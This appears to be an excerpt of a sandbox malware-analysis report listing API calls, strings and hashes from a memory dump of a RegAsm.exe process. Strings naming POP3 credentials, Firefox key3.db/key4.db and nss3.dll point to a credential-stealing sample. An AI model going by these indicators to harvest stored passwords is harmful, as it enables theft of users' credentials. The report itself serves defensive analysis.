                                                                                                                                              • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                              • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008,?,?,?,?,?,?,004012E4,?), ref: 0040730D
                                                                                                                                              • GetDeviceCaps.GDI32(004012E4,0000000A,?,?,?,?,?,?,004012E4,?), ref: 00407316
                                                                                                                                              • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                              • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                              • MoveWindow.USER32(004012E4,?,?,?,?,00000001), ref: 00407371
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1999381814-0
                                                                                                                                              • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                              • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                              • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                              • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpymemset
                                                                                                                                              • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                              • API String ID: 1297977491-3883738016
                                                                                                                                              • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                              • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                              • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                              • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                              • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                              • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                              • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                              • String ID: gj
                                                                                                                                              • API String ID: 438689982-4203073231
                                                                                                                                              • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                              • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                                              • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                              • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __aulldvrm$__aullrem
                                                                                                                                              • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                                                              • API String ID: 643879872-978417875
                                                                                                                                              • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                              • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                                                              • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                              • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040DAE3
                                                                                                                                              • memset.MSVCRT ref: 0040DAF7
                                                                                                                                              • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                              • String ID: user_pref("
                                                                                                                                              • API String ID: 765841271-2487180061
                                                                                                                                              • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                                                              • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                                                                              • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                                                              • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                                              • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                                              • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                                              • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                                              • memset.MSVCRT ref: 004058C3
                                                                                                                                              • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                                              • SetFocus.USER32(?), ref: 00405976
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$FocusItemmemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4281309102-0
                                                                                                                                              • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                              • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                                                              • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                              • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                              • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                                              • sprintf.MSVCRT ref: 0040A921
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                              • API String ID: 1631269929-4153097237
                                                                                                                                              • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                                                              • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                                                              • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                                                              • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                                                              APIs
                                                                                                                                              • _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                • Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261
                                                                                                                                              • strlen.MSVCRT ref: 00408E4F
                                                                                                                                              • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                              • memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D5C
                                                                                                                                                • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D7A
                                                                                                                                                • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D98
                                                                                                                                                • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408DA8
                                                                                                                                              Strings
                                                                                                                                              • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408DCA
                                                                                                                                              • strings, xrefs: 00408E27
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                              • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                              • API String ID: 4036804644-4125592482
                                                                                                                                              • Opcode ID: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
                                                                                                                                              • Instruction ID: 8088189cea062d7f30cfe1d816b9e84d6c9af13e32ba145f50863190e1f773ff
                                                                                                                                              • Opcode Fuzzy Hash: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
                                                                                                                                              • Instruction Fuzzy Hash: 4B3170B1101722AFD715DB15ED41E733766E7803067124A3FE981972A3CB39E8A1CB9E
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040810E
                                                                                                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,00000000,770145ED,?), ref: 004081B9
                                                                                                                                                • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: QueryValue$ByteCharFreeLibraryLoadLocalMultiWide_mbscpymemcpymemsetstrlen
                                                                                                                                              • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                              • API String ID: 3974279409-2190619648
                                                                                                                                              • Opcode ID: 8d09f37c226a803f3cefd9e7f18468d8485906a60fce263c12780c476ab64e13
                                                                                                                                              • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                                              • Opcode Fuzzy Hash: 8d09f37c226a803f3cefd9e7f18468d8485906a60fce263c12780c476ab64e13
                                                                                                                                              • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00406B8E
                                                                                                                                              • strlen.MSVCRT ref: 00406B99
                                                                                                                                              • strlen.MSVCRT ref: 00406BFF
                                                                                                                                              • strlen.MSVCRT ref: 00406C0D
                                                                                                                                              • strlen.MSVCRT ref: 00406BA7
                                                                                                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                              • String ID: key3.db$key4.db
                                                                                                                                              • API String ID: 581844971-3557030128
                                                                                                                                              • Opcode ID: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                                                                              • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                                                                                                              • Opcode Fuzzy Hash: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                                                                              • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                              • String ID: 0$6
                                                                                                                                              • API String ID: 2300387033-3849865405
                                                                                                                                              • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                                                              • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                                              • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                                                              • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 004076D7
                                                                                                                                              • sprintf.MSVCRT ref: 00407704
                                                                                                                                              • strlen.MSVCRT ref: 00407710
                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                              • strlen.MSVCRT ref: 00407733
                                                                                                                                              • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpystrlen$memsetsprintf
                                                                                                                                              • String ID: %s (%s)
                                                                                                                                              • API String ID: 3756086014-1363028141
                                                                                                                                              • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                                                              • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                                              • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                                                              • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _mbscat$memsetsprintf
                                                                                                                                              • String ID: %2.2X
                                                                                                                                              • API String ID: 125969286-791839006
                                                                                                                                              • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                                                              • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                                                              • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                                                              • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 004091EC
                                                                                                                                              • sprintf.MSVCRT ref: 00409201
                                                                                                                                                • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                                                • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                                              • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                              • String ID: caption$dialog_%d
                                                                                                                                              • API String ID: 2923679083-4161923789
                                                                                                                                              • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                                                              • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                                                              • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                                                              • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                                                              APIs
                                                                                                                                              • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                                                              Strings
                                                                                                                                              • unknown error, xrefs: 004277B2
                                                                                                                                              • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                                              • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                                              • no such savepoint: %s, xrefs: 00426A02
                                                                                                                                              • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy
                                                                                                                                              • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                              • API String ID: 3510742995-3035234601
                                                                                                                                              • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                              • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                                                                              • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                              • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset
                                                                                                                                              • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                              • API String ID: 2221118986-3608744896
                                                                                                                                              • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                              • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                                                                              • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                              • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                                                                              APIs
                                                                                                                                              • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                                                                • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcmpmemcpy
                                                                                                                                              • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                              • API String ID: 1784268899-4153596280
                                                                                                                                              • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                              • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                                                                              • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                              • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                                                                              APIs
                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                                                              • memset.MSVCRT ref: 00410246
                                                                                                                                              • memset.MSVCRT ref: 00410258
                                                                                                                                                • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                              • memset.MSVCRT ref: 0041033F
                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004103AE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3974772901-0
                                                                                                                                              • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                                              • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                                              • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                                              • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                                              APIs
                                                                                                                                              • wcslen.MSVCRT ref: 0044406C
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                                                                                                              • strlen.MSVCRT ref: 004440D1
                                                                                                                                                • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                                                                                                              • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 577244452-0
